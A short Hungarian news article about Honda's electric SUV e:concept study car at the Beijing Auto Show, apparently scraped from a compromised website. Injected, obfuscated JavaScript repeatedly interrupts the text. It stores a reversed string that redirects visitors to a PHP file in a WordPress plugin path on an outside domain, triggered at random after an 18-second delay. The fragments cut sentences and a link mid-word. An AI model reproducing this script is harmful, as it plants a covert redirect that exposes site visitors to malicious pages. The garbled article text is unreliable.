A Pekingi Autószalonon mutatkozott be az a Honda SUV e:concept tanulmányautó, amely a Honda e kisautó után másodikként képviselheti a japán autógyártót a tisztán elektromos járművek mezőnyében. A Honda szerint sorozatgyártású modellt készít elő a crossover-koncepció, amely egyébként a cég első ilyen jellegű autója Kínában. Ennek talán (remélhetőleg?) ellentmond a furcsa, hegyes orrkialakítás, bár a műszaki tartalom így is meggyőző: fejlett vezetőtámogató rendszereivel már korlátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozott önvezetésre is alkalmas. Ezt a funkcionalitást már az év vége előtt közúti tesztekre fogják Kínában; az elektromos szabadidőjármű csak ezt követően lép majd piacra. Az utastérben 10,25 colos képernyőket találunk, de a csúcsverzión 12,25 a…
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2020/09/28/mercedes-amg-e-osztaly-2021.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2020/09/28/mercedes-amg-e-osztaly-2021.html
- Hirdetés -